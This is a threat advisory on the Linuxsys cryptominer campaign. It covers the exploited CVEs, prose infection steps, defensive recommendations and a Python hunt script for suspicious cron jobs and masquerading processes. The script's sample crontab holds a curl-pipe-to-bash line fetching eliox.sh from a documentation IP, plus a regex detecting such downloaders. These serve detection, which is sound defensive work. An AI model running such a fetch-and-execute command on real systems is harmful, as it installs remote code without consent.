Linuxsys Cryptominer: A New Evasive Threat Targeting Linux Servers


The Linuxsys campaign leverages a blend of misdirection and lightweight binaries to infiltrate Linux servers. Its core operations focus on process masquerading, memory-resident binaries, and frequent self-updating mechanisms to ensure persistence and avoid detection. The malware connects to hardcoded IPs and hosts, downloads additional payloads, and uses base64 encoding and customized bash scripts to execute the miner.

Severity Level: High

Threat Overview

  • Linuxsys Cryptominer is a cryptojacking malware specifically designed to infiltrate Linux systems and covertly mine cryptocurrency by hijacking system resources.
  • All Linux-based systems with exposed SSH or web services are vulnerable.
  • Exploited Vulnerabilities: CVE-2021-41773, CVE-2023-22527, CVE-2023-34960, CVE-2023-38646, CVE-2024-0012, CVE-2024-9474, CVE-2024-36401.
  • Primary Payload: kthreaddi, a Monero (XMR) miner.
  • Affected Regions: Primarily global in scope; no specific country targeting mentioned.
  • Affected Sectors: Any organization running exposed Linux systems.

Exploitation Steps

  1. Initial Access – Script Download via Curl/Wget: A compromised Linux host is instructed (manually or via automated script) to download a bash script (eliox.sh) from a malicious server.
  2. Execution – Launching the Installer Script: The downloaded script is executed via bash, kills existing known cryptomining processes such as kdevtmpfsi and bioset, disables security mechanisms like watchdogs, manipulates directories such as /var/tmp and /dev/shm, and establishes persistence through scheduled crontab entries.
  3. Payload Delivery – Fetching the Miner and Watchdog: The script downloads additional binaries like kthreaddi (the miner) and watchdogs. These are memory-resident or dropped with disguised process names to evade detection.
  4. Execution of Miner: The Monero (XMR) mining binary is launched under a deceptive name. It connects to mining pools over TLS so the traffic blends in with ordinary encrypted connections.
  5. Persistence Mechanism – Crontab Installation: A crontab entry is created to repeatedly download and execute the script (ensuring reinfection even after a reboot or binary removal).
  6. Obfuscation and Masquerading: Binaries are renamed to mimic legitimate system processes: kworker, bioset, kdevtmpfsi, etc. Files are stored in uncommon or semi-temporary directories: /var/tmp, /dev/shm.
  7. Update and Version Control: The bash script (eliox.sh) is periodically updated on the server. The crontab ensures infected systems always pull the latest version.

Recommendations

  1. Urgently patch all systems vulnerable to listed CVEs.
  2. Deploy web application firewalls (WAFs) and restrict outbound curl/wget traffic from web servers.
  3. Hunt for unauthorized cron jobs (e.g., scripts named cron.sh) in /etc/cron.*, /var/spool/cron, and user crontabs.
  4. Monitor for new system accounts, especially with sudo/root access.
  5. Inspect shell history and recently executed scripts in /tmp, /var/tmp, or /dev/shm.
  6. Detect and block binaries with names mimicking system processes (kworker, bioset, etc.).
  7. Limit root or sudo privileges and enforce SSH key authentication.
  8. Audit SSH login attempts and credential usage.
  9. Block the IOCs at their respective controls. https://www.virustotal.com/gui/collection/5f04c4db1967557d6568ccafa4524d109d2aba61e5eed02270bbc0667abd8597/iocs
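The following hunt script is an added example written for this advisory, not code from the advisory's author or from the VulnCheck report. It implements recommendations 3, 5 and 6 against the behaviour described in the exploitation steps: cron entries that fetch and run a script or execute from /tmp, /var/tmp or /dev/shm, and processes wearing kernel-thread names (kworker, bioset, kdevtmpfsi, kthreaddi) while being backed by a real executable. The crontab lines and the 203.0.113.10 address are constructed sample data; the name kthreadd is the genuine kernel thread that kthreaddi imitates.

```python
"""Hunt for Linuxsys-style indicators: cron downloaders and masquerading miners."""
import os
import re

# Genuine kernel threads have no executable on disk, so readlink(/proc/<pid>/exe) fails.
KERNEL_THREAD_NAMES = {"kworker", "bioset", "kdevtmpfsi", "kthreadd", "kthreaddi"}
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# curl/wget whose output is piped into a shell, or that fetches a .sh file
DOWNLOADER = re.compile(r"\b(curl|wget)\b.*(\|\s*(ba)?sh\b|\.sh\b)")

# Constructed sample crontab (not from the advisory); 203.0.113.10 is a documentation address.
SAMPLE_CRONTAB = [
    "0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf",
    "*/10 * * * * curl -fsSL http://203.0.113.10/eliox.sh | bash",
    "@reboot /dev/shm/kworker",
]

def suspicious_cron_lines(lines):
    """Return entries that download-and-execute or run anything from a staging dir."""
    cmds = [l.strip() for l in lines if l.strip() and not l.strip().startswith("#")]
    return [c for c in cmds if DOWNLOADER.search(c) or any(d in c for d in STAGING_DIRS)]

def masquerade_reason(comm, exe_path):
    """Explain why a process looks disguised, or None; exe_path is None if unresolvable."""
    base = comm.strip("[]").split("/")[0]          # "kworker/0:1" -> "kworker"
    if base not in KERNEL_THREAD_NAMES or exe_path is None:
        return None
    if exe_path.startswith(STAGING_DIRS) or exe_path.endswith(" (deleted)"):
        return "kernel-thread name backed by a staged or deleted binary"
    return "kernel-thread name backed by a file on disk"

def scan_proc(proc="/proc"):
    """Report masquerading processes as (pid, comm, exe, reason) tuples."""
    findings = []
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            comm = open(f"{proc}/{pid}/comm").read().strip()
        except OSError:
            continue                                # process exited mid-scan
        try:
            exe = os.readlink(f"{proc}/{pid}/exe")
        except OSError:
            exe = None                              # kernel thread, or no permission
        reason = masquerade_reason(comm, exe)
        if reason:
            findings.append((pid, comm, exe, reason))
    return findings

if __name__ == "__main__":
    print(*suspicious_cron_lines(SAMPLE_CRONTAB), *scan_proc(), sep="\n")
```

Run it as root so every /proc/<pid>/exe link is readable; an unreadable link is treated as a kernel thread and never flagged, so an unprivileged run can miss hits.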

Source:

  • https://www.vulncheck.com/blog/linuxsys-cryptominer


Ampcus Cyber